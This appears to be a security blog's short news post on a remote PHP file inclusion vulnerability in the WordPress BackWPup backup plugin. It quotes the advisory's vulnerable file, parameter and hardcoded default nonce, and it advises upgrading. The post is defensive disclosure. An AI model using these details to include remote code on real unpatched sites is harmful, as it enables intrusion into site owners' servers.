Social Media Security

SocSec – The Social Media Security Website

Home » Wordpress & Buddypress » WordPress Vulnerability in BackWPup Plugin

A remote execution vulnerability has been discovered in WordPress backup utility BackWPup.

According to Sydney (Australia) company Sense of Security, which published the advisory along with a proof-of-concept, the vulnerability allows local or remote PHP files to be passed to a component of the utility.

“The input passed to the component wp_xml_export.php via the ‘wpabs’ variable allows the inclusion and execution of local or remote PHP files as long as a ‘_nonce’ value is known. The ‘_nonce’ value relies on a static constant which is not defined in the script meaning that it defaults to the value ‘822728c8d9’”, the advisory states.

Sense of Security says the vulnerability affects at least BackWPup Version 1.6.1 (the platform on which it has been tested), and users should upgrade to Version 1.7.1.

Digg This
Reddit This
Stumble Now!
Buzz This
Vote on DZone
Share on Facebook
Bookmark this on Delicious
Kick It on DotNetKicks.com
Shout it
Share on LinkedIn
Bookmark this on Technorati
Post on Twitter
Google Buzz (aka. Google Reader)

1 Tweet

One Response so far.

  1. WordPress Vulnerability in BackWPup Plugin http://bit.ly/hnlfGu

    This comment was originally posted on Twitter

      More from author

Additional comments powered byBackType

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin
  • Youtube

Twitter updates

No public Twitter messages.

Popular Posts

Which Social Network

In the list below, please select all the social networks ...

Facebook Asks You Wh

On Friday, Facebook offered its users a sneak peak ...

Facebook Justin Bieb

“I can’t believe a GIRL did this just because ...

Friendster Hacked ?

Multiple users have reported receiving spam emails containing their Friendster ...

How To Disappear Fro

You will notice that on your profile, that the number ...

Sponsors

  • Cheap reliable web hosting from WebHostingHub.com.
  • Domain name search and availability check by PCNames.com.
  • Website and logo design contests at DesignContest.net.
  • Reviews of the best cheap web hosting providers at WebHostingRating.com.